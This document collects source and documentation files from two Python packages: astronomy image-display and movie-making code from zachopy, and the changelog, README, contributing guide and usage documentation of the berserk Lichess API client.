# try to update the data within the existing plots (faster), otherwise
zoomed = image[self.ylim[0]:self.ylim[1], self.xlim[0]:self.xlim[1]]
# readjust things if a log scale is set
if self.log:
zoomedtoplot = logify(zoomed)
imagetoplot = logify(image)
else:
zoomedtoplot = zoomed
imagetoplot = image
# calculate summed histograms
xhist = np.sum(zoomed, 0)
yhist = np.sum(zoomed, 1)
self.current['image'].set_data(zoomedtoplot)
self.current['navigator'].set_data(imagetoplot)
self.current['xhist'].set_ydata(xhist)
self.current['yhist'].set_xdata(yhist)
self.speak('replaced existing image with new one')
self.ax['image'].set_xlabel(xlabel, fontsize=8)
self.ax['image'].set_ylabel(ylabel, fontsize=8)
#plt.draw()
if output is None:
pass
else:
chunks = output.split('/')
chunks[-1] = self.label + '_'+chunks[-1]
filename = '/'.join(chunks)
self.figure.savefig(filename)
self.speak('saved plot to {0}'.format(filename))
def initialize(self, image, customize=True, xlim=None, ylim=None, xlabel='', ylabel='', log=True, vmin=None, vmax=None, maxresolution=1280, **kwargs):
'''Display one image, give user a chance to zoom in, and leave everything set for populating with later images.'''
if customize | (xlim is None )| (ylim is None):
self.xlim = [0, image.shape[1]]
self.ylim = [0, image.shape[0]]
else:
self.xlim = xlim
self.ylim = ylim
zoomed = image[self.ylim[0]:self.ylim[1], self.xlim[0]:self.xlim[1]]
# create the figure, using xlim and ylim to determine the scale of the figure
plt.ion()
# create an empty dictionary to store the axes objects
self.ax = {}
# calculate aspect ratio (y/x)
self.ysize, self.xsize = self.ylim[1] - self.ylim[0], self.xlim[1] - self.xlim[0]
aspect = np.float(self.ysize)/self.xsize
# set up the geometry of the plotting figure, including the desired resolution, histograms, and space for labels
scale = 7.5
dpi = maxresolution/np.maximum(scale, scale*aspect)
margin = 0.07
histheight = 0.1
inflate = 2*margin + histheight +1
self.figure = plt.figure(figsize=(scale*inflate, scale*aspect*inflate), dpi=dpi)
gs = plt.matplotlib.gridspec.GridSpec(2,2,width_ratios=[1,histheight], height_ratios=[histheight, 1], top=1-margin, bottom=margin, left=margin, right=1-margin, hspace=0, wspace=0)
# define panes for the image, as well as summed x and y histogram plots
self.ax['image'] = plt.subplot(gs[1,0])
self.ax['xhist'] = plt.subplot(gs[0,0], sharex=self.ax['image'] )
self.ax['yhist'] = plt.subplot(gs[1,1], sharey=self.ax['image'] )
self.ax['navigator'] = plt.subplot(gs[0,1])
# clear the axes labels
for k in self.ax.keys():
plt.setp(self.ax[k].get_xticklabels(), visible=False)
plt.setp(self.ax[k].get_yticklabels(), visible=False)
# set default image display keywords
self.imagekw = dict(cmap='gray',interpolation='nearest',extent=[0, self.xsize, 0, self.ysize], aspect='equal')
# replace any of these, as defined through the input keywords
for k in kwargs.keys():
self.imagekw[k] = kwargs[k]
#if customize:
# self.imagekw['aspect'] = 'auto'
# set the default line plotting keywords
self.linekw = dict(color='black', linewidth=1, alpha=0.5)
# make sure the min and max values for the color scale are set
if vmin is None:
vmin = np.min(image)
if vmax is None:
vmax = np.max(image)
self.vmin, self.vmax = vmin, vmax
# keep track of whether we're using a log scale
self.log = log
# calculate summed histograms
xhist = np.sum(zoomed, 0)
yhist = np.sum(zoomed, 1)
# readjust things if a log scale is set
if self.log:
zoomedtoplot = logify(zoomed)
imagetoplot = logify(image)
self.imagekw['vmin'] = np.log(np.maximum(vmin, 1))
self.imagekw['vmax'] = np.log(vmax)
else:
zoomedtoplot = zoomed
imagetoplot = image
self.imagekw['vmin'] = vmin
self.imagekw['vmax'] = vmax
# keep the navigator like the image, but adjust its extent back to the regular
self.navigatorkw = self.imagekw.copy()
self.navigatorkw['extent'] = [0,image.shape[1], 0, image.shape[0]]
# keep track of the data that goes into each plot
self.current = {}
# plot the histograms, once zoomed in
self.current['xhist'] = self.ax['xhist'].plot(np.arange(len(xhist)), xhist, **self.linekw)[0]
self.current['yhist'] = self.ax['yhist'].plot(yhist, np.arange(len(yhist)), **self.linekw)[0]
self.ax['xhist'].set_xlim(0, zoomed.shape[1]-1)
self.ax['xhist'].set_ylim(vmin*zoomed.shape[0], vmax*zoomed.shape[0])
self.ax['yhist'].set_xlim(vmin*zoomed.shape[1], vmax*zoomed.shape[1])
self.ax['xhist'].set_yscale('log')
self.ax['yhist'].set_xscale('log')
self.ax['yhist'].set_ylim(0, zoomed.shape[0]-1)
# plot the (zoomed) image
self.current['image'] = self.ax['image'].imshow(zoomedtoplot, **self.imagekw)
self.current['navigator'] = self.ax['navigator'].imshow(imagetoplot, **self.navigatorkw)
self.current['rectangle'] = self.ax['navigator'].add_patch(plt.matplotlib.patches.Rectangle((self.xlim[0], self.ylim[0]), self.xlim[1] - self.xlim[0], self.ylim[1]-self.ylim[0], edgecolor='red', facecolor='none', alpha=0.5, linewidth=5))
self.speak('created new image and plots')
if customize:
self.name = self.input('Please zoom to desired limits, enter a label to identify this window, and press return:')
xlim, ylim = np.array(self.ax['image'].get_xlim()), np.array(self.ax['image'].get_ylim())
xlim[0] = np.maximum(xlim[0], 0)
ylim[0] = np.maximum(ylim[0], 0)
xlim[1] = np.minimum(xlim[1], self.xsize)
ylim[1] = np.minimum(ylim[1], self.ysize)
self.initialize(image, customize=False, xlim=xlim, ylim=ylim, log=log, vmin=vmin, vmax=vmax, maxresolution=maxresolution, **kwargs)
self.speak('the display has been fully initialized -- ready for new plots!') | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/displays/imshow.py | imshow.py |
from Display import *
import matplotlib.animation as animation
class Movie(Display):
'''Display 3D dataset as a movie.'''
def __init__(self, **kwargs):
Display.__init__(self, **kwargs)
def fromPDFs(self, pattern, directory=None, stride=1, bitrate=1800*10, fps=30, **kwargs):
# load the filenames to include
self.filenames = glob.glob(pattern)[::stride]
# make sure the output directory exists
if directory is None:
directory = 'movie/'
zachopy.utils.mkdir(directory)
for i in range(len(self.filenames)):
input = self.filenames[i]
png = directory + 'formovie_{0:05.0f}.png'.format(i)#input.replace('/', '_').replace('.pdf', '.png')
command = 'convert -density 100 {input} {png}'.format(**locals())
print command
os.system(command)
moviecommand = 'convert -delay 10 {directory}*.png movie.mp4'.format(**locals())
print moviecommand
os.system(moviecommand)
def fromFITSfiles(self, pattern, directory=None, stride=1, bitrate=1800*5, fps=30, **kwargs):
# load the filenames to include
self.filenames = glob.glob(pattern)[::stride]
# make sure the output directory exists
if directory is not None:
zachopy.utils.mkdir(directory)
#initialize the plot
i = 0
self.speak('opening {0}'.format(self.filenames[i]))
hdu = astropy.io.fits.open(self.filenames[i])
self.image = np.transpose(hdu[0].data)
self.frame = imshow(self.image, **kwargs)
# initialize the animator
metadata = dict(title=self.frame.name, artist='Z.K.B.-T.')
self.writer = animation.FFMpegWriter(fps=fps, metadata=metadata, bitrate=bitrate)
print directory + '/' + self.frame.label + '.mp4'
with self.writer.saving(self.frame.figure, directory + '/' + self.frame.label + '.mp4', self.frame.figure.get_dpi()):
# loop over exposures
for i in range(len(self.filenames)):
self.speak('opening {0}'.format(self.filenames[i]))
hdu = astropy.io.fits.open(self.filenames[i])
self.image = np.transpose(hdu[0].data)
if directory is not None:
output = directory + '/{0:04.0f}.png'.format(i)
else:
output = None
self.frame.update(self.image, ylabel=self.filenames[i].split('/')[-1], xlabel='/'.join(self.filenames[i].split('/')[0:-1])+'/')
self.writer.grab_frame() | zachopy | /zachopy-0.1.4.tar.gz/zachopy-0.1.4/displays/movie.py | movie.py |
History
=======
0.11.0 (2021-03-18)
-------------------
* Add ``Tournaments.create_arena`` for creating arena tournaments
* Add ``Tournaments.create_swiss`` for creating swiss tournaments
* Add ``Tournaments.export_arena_games`` for exporting arena games
* Add ``Tournaments.export_swiss_games`` for exporting swiss games
* Add ``Tournaments.arena_by_team`` for getting arena tournaments by team
* Add ``Tournaments.swiss_by_team`` for getting swiss tournaments by team
* Add ``Tournaments.tournaments_by_user`` for getting tournaments by user
* Deprecated ``Tournaments.create`` and ``Tournaments.export_games``
* Uploaded fork to pypi
* Minor fixes for docstrings
* Minor updates to README, AUTHORS
0.10.0 (2020-04-26)
-------------------
* Add ``Challenge.create_ai`` for creating an AI challenge
* Add ``Challenge.create_open`` for creating an open challenge
* Add ``Challenge.create_with_accept`` auto-acceptance of challenges using OAuth token
* Bugfix for passing initial board positions in FEN for challenges
* Minor fixes for docstrings
0.9.0 (2020-04-14)
------------------
* Add remaining ``Board`` endpoints: seek, handle_draw_offer, offer_draw, accept_draw, and decline_draw
* Multiple doc updates/fixes
* Add codecov reporting
0.8.0 (2020-03-08)
------------------
* Add new ``Board`` client: stream_incoming_events, stream_game_state, make_move, post_message, abort_game, and resign_game
0.7.0 (2020-01-26)
------------------
* Add simuls
* Add studies export and export chapter
* Add tournament results, games export, and list by creator
* Add user followers, users following, rating history, and puzzle activity
* Add new ``Teams`` client: join, get members, kick member, and leave
* Updated documentation, including new docs for some useful utils
* Fixed bugs in ``Tournaments.export_games``
* Deprecated ``Users.get_by_team`` - use ``Teams.get_members`` instead
0.6.1 (2020-01-20)
------------------
* Add py37 to the travis build
* Update development status classifier to 4 - Beta
* Fix py36 issue preventing successful build
* Make updates to the Makefile
0.6.0 (2020-01-20)
------------------
* Add logging to the ``berserk.session`` module
* Fix exception message when no cause
* Fix bug in ``Broadcasts.push_pgn_update``
* Update documentation and tweak the theme
0.5.0 (2020-01-20)
------------------
* Add ``ResponseError`` for 4xx and 5xx responses with status code, reason, and cause
* Add ``ApiError`` for all other request errors
* Fix test case broken by 0.4.0 release
* Put all utils code under test
0.4.0 (2020-01-19)
------------------
* Add support for the broadcast endpoints
* Add a utility for easily converting API objects into update params
* Fix multiple bugs with the tournament create endpoint
* Improve the reusability of some conversion utilities
* Improve many docstrings in the client classes
0.3.2 (2020-01-04)
------------------
* Fix bug where options not passed for challenge creation
* Convert requirements from pinned to sematically compatible
* Bump all developer dependencies
* Use pytest instead of the older py.test
* Use py37 in tox
0.3.1 (2018-12-23)
------------------
* Convert datetime string in tournament creation response into datetime object
0.3.0 (2018-12-23)
------------------
* Convert all timestamps to datetime in all responses
* Provide support for challenging other players to a game
0.2.1 (2018-12-08)
------------------
* Bump requests dependency to >-2.20.0 (CVE-2018-18074)
0.2.0 (2018-12-08)
------------------
* Add `position` and `start_date` params to `Tournament.create`
* Add `Position` enum
0.1.2 (2018-07-14)
------------------
* Fix an asine bug in the docs
0.1.1 (2018-07-14)
------------------
* Added tests for session and formats modules
* Fixed mispelled PgnHandler class (!)
* Fixed issue with trailing whitespace when splitting multiple PGN texts
* Fixed the usage overview in the README
* Fixed the versions for travis-ci
* Made it easier to test the `JsonHandler` class
* Salted the bumpversion config to taste
0.1.0 (2018-07-10)
------------------
* First release on PyPI.
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/HISTORY.rst | HISTORY.rst |
=======
berserk
=======
.. image:: https://img.shields.io/pypi/v/berserk.svg
:target: https://pypi.python.org/pypi/zack-berserk
:alt: Available on PyPI
.. image:: https://img.shields.io/travis/rhgrant10/berserk.svg
:target: https://travis-ci.org/rhgrant10/berserk
:alt: Continuous Integration
.. image:: https://codecov.io/gh/rhgrant10/berserk/branch/master/graph/badge.svg
:target: https://codecov.io/gh/rhgrant10/berserk
:alt: Code Coverage
.. image:: https://readthedocs.org/projects/berserk/badge/?version=latest
:target: https://berserk.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
Python client for the `Lichess API`_.
.. _Lichess API: https://lichess.org/api
* Free software: GNU General Public License v3
* Documentation: https://berserk.readthedocs.io.
Features
========
* handles JSON and PGN formats at user's discretion
* token auth session
* easy integration with OAuth2
* automatically converts time values to datetimes
Usage
=====
You can use any ``requests.Session``-like object as a session, including those
from ``requests_oauth``. A simple token session is included, as shown below:
.. code-block:: python
import berserk
session = berserk.TokenSession(API_TOKEN)
client = berserk.Client(session=session)
Most if not all of the API is available:
.. code-block:: python
client.account.get
client.account.get_email
client.account.get_preferences
client.account.get_kid_mode
client.account.set_kid_mode
client.account.upgrade_to_bot
client.users.get_puzzle_activity
client.users.get_realtime_statuses
client.users.get_all_top_10
client.users.get_leaderboard
client.users.get_public_data
client.users.get_activity_feed
client.users.get_by_id
client.users.get_by_team
client.users.get_live_streamers
client.users.get_users_followed
client.users.get_users_following
client.users.get_rating_history
client.teams.get_members
client.teams.join
client.teams.leave
client.teams.kick_member
client.games.export
client.games.export_by_player
client.games.export_multi
client.games.get_among_players
client.games.get_ongoing
client.games.get_tv_channels
client.challenges.create
client.challenges.create_ai
client.challenges.create_open
client.challenges.create_with_accept
client.challenges.accept
client.challenges.decline
client.board.stream_incoming_events
client.board.seek
client.board.stream_game_state
client.board.make_move
client.board.post_message
client.board.abort_game
client.board.resign_game
client.board.handle_draw_offer
client.board.offer_draw
client.board.accept_draw
client.board.decline_draw
client.bots.stream_incoming_events
client.bots.stream_game_state
client.bots.make_move
client.bots.post_message
client.bots.abort_game
client.bots.resign_game
client.bots.accept_challenge
client.bots.decline_challenge
client.tournaments.get
client.tournaments.create_arena
client.tournaments.create_swiss
client.tournaments.export_arena_games
client.tournaments.export_swiss_games
client.tournaments.arena_by_team
client.tournaments.swiss_by_team
client.tournaments.stream_results
client.tournaments.stream_by_creator
client.broadcasts.create
client.broadcasts.get
client.broadcasts.update
client.broadcasts.push_pgn_update
client.simuls.get
client.studies.export_chapter
client.studies.export
Details for each function can be found in the `full documentation <https://berserk.readthedocs.io>`_.
Credits
=======
This package was created with Cookiecutter_ and the
`audreyr/cookiecutter-pypackage`_ project template.
.. _Cookiecutter: https://github.com/audreyr/cookiecutter
.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/README.rst | README.rst |
.. highlight:: shell
Contributing
============
Contributions are welcome, and they are greatly appreciated! Every little bit
helps, and credit will always be given.
You can contribute in many ways:
Types of Contributions
----------------------
Report Bugs
~~~~~~~~~~~
Report bugs at https://github.com/rhgrant10/berserk/issues.
If you are reporting a bug, please include:
* Your operating system name and version.
* Any details about your local setup that might be helpful in troubleshooting.
* Detailed steps to reproduce the bug.
Fix Bugs
~~~~~~~~
Look through the GitHub issues for bugs. Anything tagged with "bug" and "help
wanted" is open to whoever wants to implement it.
Implement Features
~~~~~~~~~~~~~~~~~~
Look through the GitHub issues for features. Anything tagged with "enhancement"
and "help wanted" is open to whoever wants to implement it.
Write Documentation
~~~~~~~~~~~~~~~~~~~
berserk could always use more documentation, whether as part of the
official berserk docs, in docstrings, or even on the web in blog posts,
articles, and such.
Submit Feedback
~~~~~~~~~~~~~~~
The best way to send feedback is to file an issue at https://github.com/rhgrant10/berserk/issues.
If you are proposing a feature:
* Explain in detail how it would work.
* Keep the scope as narrow as possible, to make it easier to implement.
* Remember that this is a volunteer-driven project, and that contributions
are welcome :)
Get Started!
------------
Ready to contribute? Here's how to set up `berserk` for local development.
1. Fork the `berserk` repo on GitHub.
2. Clone your fork locally::
$ git clone [email protected]:your_name_here/berserk.git
3. Install your local copy into a virtualenv. Assuming you have virtualenvwrapper installed, this is how you set up your fork for local development::
$ mkvirtualenv berserk
$ cd berserk/
$ python setup.py develop
4. Create a branch for local development::
$ git checkout -b name-of-your-bugfix-or-feature
Now you can make your changes locally.
5. When you're done making changes, check that your changes pass flake8 and the
tests, including testing other Python versions with tox::
$ flake8 berserk tests
$ python setup.py test or py.test
$ tox
To get flake8 and tox, just pip install them into your virtualenv.
6. Commit your changes and push your branch to GitHub::
$ git add .
$ git commit -m "Your detailed description of your changes."
$ git push origin name-of-your-bugfix-or-feature
7. Submit a pull request through the GitHub website.
Pull Request Guidelines
-----------------------
Before you submit a pull request, check that it meets these guidelines:
1. The pull request should include tests.
2. If the pull request adds functionality, the docs should be updated. Put
your new functionality into a function with a docstring, and add the
feature to the list in README.rst.
3. The pull request should work for Python 2.7, 3.4, 3.5 and 3.6, and for PyPy. Check
https://travis-ci.org/rhgrant10/berserk/pull_requests
and make sure that the tests pass for all supported Python versions.
Tips
----
To run a subset of tests::
$ py.test tests.test_berserk
Deploying
---------
A reminder for the maintainers on how to deploy.
Make sure all your changes are committed (including an entry in HISTORY.rst).
Then run::
$ bumpversion patch # possible: major / minor / patch
$ git push
$ git push --tags
Travis will then deploy to PyPI if tests pass.
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/CONTRIBUTING.rst | CONTRIBUTING.rst |
=====
Usage
=====
Use ``berserk`` by creating an API client:
.. code-block:: python
>>> import berserk
>>> client = berserk.Client()
Authenticating
==============
By default the client does not perform any authentication. However many of the
endpoints are not open. To use a form of authentication, just pass the
appropriate ``requests.Session``-like object:
- using an API token: ``berserk.TokenSession``
- using oauth: ``requests_oauthlib.Oauth2Session``
.. note::
Some endpoints require specific Oauth2 permissions.
Using an API token
------------------
If you have a personal API token, you can simply use the ``TokenSession``
provided. For example, assuming you have written your token to
``'./lichess.token'``:
.. code-block:: python
>>> with open('./lichess.token') as f:
... token = f.read()
...
>>> session = berserk.TokenSession(token)
>>> client = berserk.Client(session)
Using Oauth2
------------
Some of the endpoints require OAuth2 authentication. Although outside the
scope of this documentation, you can use ``requests_oauthlib.Oauth2Session``
for this.
.. code-block:: python
>>> from requests_oauthlib import OAuth2Session
>>> session = OAuth2Session(...)
>>> client = berserk.Client(session)
Accounts
========
Information and Preferences
---------------------------
.. code-block:: python
>>> client.account.get()
{'blocking': False,
'count': {...},
'createdAt': datetime.datetime(2018, 5, 16, 8, 9, 18, 187000),
'followable': True,
'following': False,
'followsYou': False,
'id': 'rhgrant10',
'nbFollowers': 1,
'nbFollowing': 1,
'online': True,
'perfs': {...},
'playTime': {...},
'seenAt': datetime.datetime(2018, 12, 9, 10, 28, 30, 221000),
'url': 'https://lichess.org/@/rhgrant10',
'username': 'rhgrant10'}
>>> client.account.get_email()
'[email protected]'
>>> client.account.get_preferences()
{'animation': 2,
'autoQueen': 1,
...
'transp': False,
'zen': 0}}
Kid Mode
--------
Using Oauth2, you can set the kid mode.
.. code-block:: python
>>> client.account.set_kid_mode(True) # enable
True
>>> client.account.set_kid_mode(False) # disable
True
Note that the ``set_kid_mode`` method returns an indicator of success and *not*
the current or previous status.
.. code-block:: python
>>> def show_kid_mode():
... is_enabled = client.account.get_kid_mode()
... print('enabled' if is_enabled else 'disabled')
...
>>> show_kid_mode()
disabled
>>> # try to enable, but the request fails
>>> client.account.set_kid_mode(True)
False
>>> show_kid_mode()
disabled
>>> # try again, this time it succeeds
>>> client.account.set_kid_mode(True)
True
>>> show_kid_mode()
enabled
Bot Account Upgrade
-------------------
If this is a new account that has not yet played a game, and if you
have the required OAuth2 permission, you can upgrade the account to a bot
account:
.. code-block:: python
>>> client.account.upgrade_to_bot()
Read more below about how to use bot functionality.
Users and Teams
===============
Realtime Statuses
-----------------
Get realtime information about one or more players:
.. code-block:: python
>>> players = ['Sasageyo', 'Voinikonis_Nikita', 'Zugzwangerz', 'DOES-NOT-EXIST']
>>> client.users.get_realtime_statuses(players)
[{'id': 'sasageyo',
'name': 'Sasageyo',
'title': 'IM',
'online': True,
'playing': True},
{'id': 'voinikonis_nikita',
'name': 'Voinikonis_Nikita',
'title': 'FM',
'online': True,
'playing': True},
{'id': 'zugzwangerz', 'name': 'Zugzwangerz'}]
Top 10 Lists
------------
.. code-block:: python
>>> top10 = client.users.get_all_top_10()
>>> list(top10)
['bullet',
'blitz',
'rapid',
'classical',
'ultraBullet',
'crazyhouse',
'chess960',
'kingOfTheHill',
'threeCheck',
'antichess',
'atomic',
'horde',
'racingKings']
>>> top10['horde'][0]
{'id': 'ingrid-vengeance',
'perfs': {'horde': {'progress': 22, 'rating': 2443}},
'username': 'Ingrid-Vengeance'}
Leaderboards
------------
.. code-block:: python
>>> client.users.get_leaderboard('horde', count=11)[-1]
{'id': 'philippesaner',
'perfs': {'horde': {'progress': 10, 'rating': 2230}},
'username': 'PhilippeSaner'}
Public Data
-----------
.. code-block:: python
>>> client.users.get_public_data('PhilippeSaner')
{'completionRate': 87,
'count': {...},
'createdAt': datetime.datetime(2017, 1, 9, 16, 14, 31, 140000),
'id': 'philippesaner',
'nbFollowers': 40,
'nbFollowing': 13,
'online': False,
'perfs': {...},
'playTime': {'total': 1505020, 'tv': 1038007},
'profile': {'country': 'CA', 'location': 'Ottawa'},
'seenAt': datetime.datetime(2018, 12, 9, 10, 26, 28, 22000),
'url': 'https://lichess.org/@/PhilippeSaner',
'username': 'PhilippeSaner'}
Activity Feeds
--------------
.. code-block:: python
>>> feed = client.users.get_activity_feed('PhilippeSaner')
>>> feed[0]
{'games': {'horde': {'draw': 0,
'loss': 1,
'rp': {'after': 2230, 'before': 2198},
'win': 12}},
'interval': {'end': datetime.datetime(2018, 12, 9, 16, 0),
'start': datetime.datetime(2018, 12, 8, 16, 0)},
'tournaments': {'best': [{'nbGames': 1,
'rank': 6,
'rankPercent': 33,
'score': 2,
'tournament': {'id': '9zm2uIdP', 'name': 'Daily Horde Arena'}}],
'nb': 1}}
Team Members
------------
.. code-block:: python
>>> client.users.get_by_team('coders')
<map at 0x107c1acc0>
>>> members = list(_)
>>> len(members)
228
Live Streamers
--------------
.. code-block:: python
>>> client.users.get_live_streamers()
[{'id': 'chesspatzerwal', 'name': 'ChesspatzerWAL', 'patron': True},
{'id': 'ayrtontwigg', 'name': 'AyrtonTwigg', 'playing': True},
{'id': 'fanatikchess', 'name': 'FanatikChess', 'patron': True},
{'id': 'jwizzy74', 'name': 'Jwizzy74', 'patron': True, 'playing': True},
{'id': 'devjamesb', 'name': 'DevJamesB', 'playing': True},
{'id': 'kafka4x', 'name': 'Kafka4x', 'playing': True},
{'id': 'sparklehorse', 'name': 'Sparklehorse', 'patron': True, 'title': 'IM'},
{'id': 'ivarcode', 'name': 'ivarcode', 'playing': True},
{'id': 'pepellou', 'name': 'pepellou', 'patron': True, 'playing': True},
{'id': 'videogamepianist', 'name': 'VideoGamePianist', 'playing': True}]
Exporting Games
===============
By Player
---------
Finished games can be exported and current games can be listed. Let's take a
look at the most recent 300 games played by "LeelaChess" on Dec. 8th, 2018:
.. code-block:: python
>>> start = berserk.utils.to_millis(datetime(2018, 12, 8))
>>> end = berserk.utils.to_millis(datetime(2018, 12, 9))
>>> client.games.export_by_player('LeelaChess', since=start, until=end,
max=300))
<generator object Games.export_by_player at 0x10c24b048>
>>> games = list(_)
>>> games[0]['createdAt']
datetime.datetime(2018, 12, 9, 22, 54, 24, 195000, tzinfo=datetime.timezone.utc)
>>> games[-1]['createdAt']
datetime.datetime(2018, 12, 8, 9, 11, 42, 229000, tzinfo=datetime.timezone.utc)
Wow, they play a lot of chess :)
By ID
-----
You can export games too using their IDs. Let's export the last game LeelaChess
played that day:
.. code-block:: python
>>> game_id = games[0]['id']
>>> client.games.export(game_id)
{'analysis': [...],
'clock': {'increment': 8, 'initial': 300, 'totalTime': 620},
'createdAt': datetime.datetime(2018, 12, 9, 22, 54, 24, 195000, tzinfo=datetime.timezone.utc),
'id': 'WatQhhbJ',
'lastMoveAt': datetime.datetime(2018, 12, 9, 23, 5, 59, 396000, tzinfo=datetime.timezone.utc),
'moves': ...
'opening': {'eco': 'D38',
'name': "Queen's Gambit Declined: Ragozin Defense",
'ply': 8},
'perf': 'rapid',
'players': {'black': {'analysis': {'acpl': 44,
'blunder': 1,
'inaccuracy': 4,
'mistake': 2},
'rating': 1333,
'ratingDiff': 0,
'user': {'id': 'fsoto', 'name': 'fsoto'}},
'white': {'analysis': {'acpl': 11,
'blunder': 0,
'inaccuracy': 2,
'mistake': 0},
'provisional': True,
'rating': 2490,
'ratingDiff': 0,
'user': {'id': 'leelachess', 'name': 'LeelaChess', 'title': 'BOT'}}},
'rated': True,
'speed': 'rapid',
'status': 'mate',
'variant': 'standard',
'winner': 'white'}
PGN vs JSON
-----------
Of course sometimes PGN format is desirable. Just pass ``as_pgn=True`` to
any of the export methods:
.. code-block:: python
>>> pgn = client.games.export(game_id, as_pgn=True)
>>> print(pgn)
[Event "Rated Rapid game"]
[Site "https://lichess.org/WatQhhbJ"]
[Date "2018.12.09"]
[Round "-"]
[White "LeelaChess"]
[Black "fsoto"]
[Result "1-0"]
[UTCDate "2018.12.09"]
[UTCTime "22:54:24"]
[WhiteElo "2490"]
[BlackElo "1333"]
[WhiteRatingDiff "+0"]
[BlackRatingDiff "+0"]
[WhiteTitle "BOT"]
[Variant "Standard"]
[TimeControl "300+8"]
[ECO "D38"]
[Opening "Queen's Gambit Declined: Ragozin Defense"]
[Termination "Normal"]
1. d4 { [%eval 0.08] [%clk 0:05:00] } 1... d5 ...
TV Channels
-----------
.. code-block:: python
>>> channels = client.games.get_tv_channels()
>>> list(channels)
['Bot',
'Blitz',
'Racing Kings',
'UltraBullet',
'Bullet',
'Classical',
'Three-check',
'Antichess',
'Computer',
'Horde',
'Rapid',
'Atomic',
'Crazyhouse',
'Chess960',
'King of the Hill',
'Top Rated']
>>> channels['King of the Hill']
{'gameId': 'YPL6tP2K',
'rating': 1554,
'user': {'id': 'linischoki', 'name': 'linischoki'}}
Working with tournaments
========================
You have to specify the clock time, increment, and minutes, but creating a new
tournament is easy:
.. code-block:: python
>>> client.tournaments.create_arena(clock_time=10, clock_increment=3, minutes=180)
{'berserkable': True,
'clock': {'increment': 3, 'limit': 600},
'createdBy': 'rhgrant10',
'duels': [],
'fullName': "O'Kelly Arena",
'greatPlayer': {'name': "O'Kelly",
'url': "https://wikipedia.org/wiki/Alb%C3%A9ric_O'Kelly_de_Galway"},
'id': '3uwyXjiC',
'minutes': 180,
'nbPlayers': 0,
'perf': {'icon': '#', 'name': 'Rapid'},
'quote': {'author': 'Bent Larsen',
'text': 'I often play a move I know how to refute.'},
'secondsToStart': 300,
'standing': {'page': 1, 'players': []},
'startsAt': '2018-12-10T00:32:12.116Z',
'system': 'arena',
'variant': 'standard',
'verdicts': {'accepted': True, 'list': []}}
You can specify the starting position for new tournaments using one of the
provided enum value in ``berserk.enums.Position``:
.. code-block:: python
>>> client.tournaments.create(clock_time=10, clock_increment=3, minutes=180,
position=berserk.enums.Position.KINGS_PAWN)
You can also create Swiss tournaments easily, specifying the team id, clock time,
clock increment, and number of rounds.
.. code-block:: python
>>> client.tournaments.create_swiss(teamid_="coders", clock_limit=10,
clock_increment=0, nbRounds=5)
{'rated': true,
'clock': {'increment': 0, 'limit': 600},
'createdBy': "zccze",
'greatPlayer': {'name': "Wang',
'url':'https://wikipedia.org/wiki/Wang_Hao_(chess_player)' },
'id': '3uwyXjiC'
'name': 'Wang',
'nbOngoing': 0,
'nbPlayers': 0,
'nbRounds': 5,
'nextRound': { 'at': '2021-05-18T12:23:18.233-06:00', 'in': 600},
'quote': {'author': 'Bent Larsen',
'text': 'I often play a move I know how to refute.'},
'round': 0,
'startsAt': '2021-05-18T12:23:18.233-06:00',
'status': 'created',
'variant': 'standard'
}
Additionally you can see tournaments that have recently finished, are in
progress, and are about to start:
.. code-block:: python
>>> tournaments = client.tournaments.get()
>>> list(tournaments)
['created', 'started', 'finished']
>>> len(tournaments['created'])
19
>>> tournaments['created'][0]
{'clock': {'increment': 0, 'limit': 300},
'createdBy': 'bashkimneziri',
'finishesAt': datetime.datetime(2018, 12, 24, 0, 21, 2, 179000, tzinfo=datetime.timezone.utc),
'fullName': 'GM Arena',
'id': 'COnVgmKH',
'minutes': 45,
'nbPlayers': 1,
'perf': {'icon': ')', 'key': 'blitz', 'name': 'Blitz', 'position': 1},
'rated': True,
'secondsToStart': 160,
'startsAt': datetime.datetime(2018, 12, 23, 23, 36, 2, 179000, tzinfo=datetime.timezone.utc),
'status': 10,
'system': 'arena',
'variant': {'key': 'standard', 'name': 'Standard', 'short': 'Std'},
'winner': None}
Being a bot
===========
.. warning::
These commands only work using bot accounts. Make sure you have converted
the account with which you authenticate into a bot account first. See
above for details.
Bots stream game information and react by calling various endpoints. There are
two streams of information:
1. incoming events
2. state of a particular game
In general, a bot will listen to the stream of incoming events, determine which
challenges to accept, and once accepted, listen to the stream of game states
and respond with the best moves in an attempt to win as many games as possible.
You *can* create a bot that looses intentionally if that makes you happy, but
regardless you will need to listen to both streams of information.
The typical pattern is to have one main thread that listens to the event
stream and spawns new threads when accepting challenges. Each challenge thread
then listens to the stream of state for that particular game and plays it to
completion.
Responding to challenges
------------------------
Here the goal is to respond to challenges and spawn workers to play those
accepted. Here's a bit of sample code that hits the highlights:
.. code-block:: python
>>> is_polite = True
>>> for event in client.bots.stream_incoming_events():
... if event['type'] == 'challenge':
... if should_accept(event):
... client.bots.accept_challenge(event['id'])
... elif is_polite:
... client.bots.decline_challenge(event['id'])
... elif event['type'] == 'gameStart':
... game = Game(event['id'])
... game.start()
...
Playing a game
--------------
Having accepted a challenge and recieved the gameStart event for it, the main
job here is to listen and react to the stream of the game state:
.. code-block:: python
>>> class Game(threading.Thread):
... def __init__(self, client, game_id, **kwargs):
... super().__init__(**kwargs)
... self.game_id = game_id
... self.client = client
... self.stream = client.bots.stream_game_state(game_id)
... self.current_state = next(self.stream)
...
... def run(self):
... for event in self.stream:
... if event['type'] == 'gameState':
... self.handle_state_change(event)
... elif event['type'] == 'chatLine':
... self.handle_chat_line(event)
...
... def handle_state_change(self, game_state):
... pass
...
... def handle_chat_line(self, chat_line):
... pass
...
Obviously the code above is just to communicate the gist of what is required.
But once you have your framework for reacting to changes in game state, there
are a variety of actions you can take:
.. code-block:: python
>>> client.bots.make_move(game_id, 'e2e4')
True
>>> client.bots.abort_game(game_id)
True
>>> client.bots.resign_game(game_id)
True
>>> client.bots.post_message(game_id, 'Prepare to loose')
True
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/docs/usage.rst | usage.rst |
Welcome to berserk's documentation!
======================================
.. image:: https://img.shields.io/pypi/v/berserk.svg
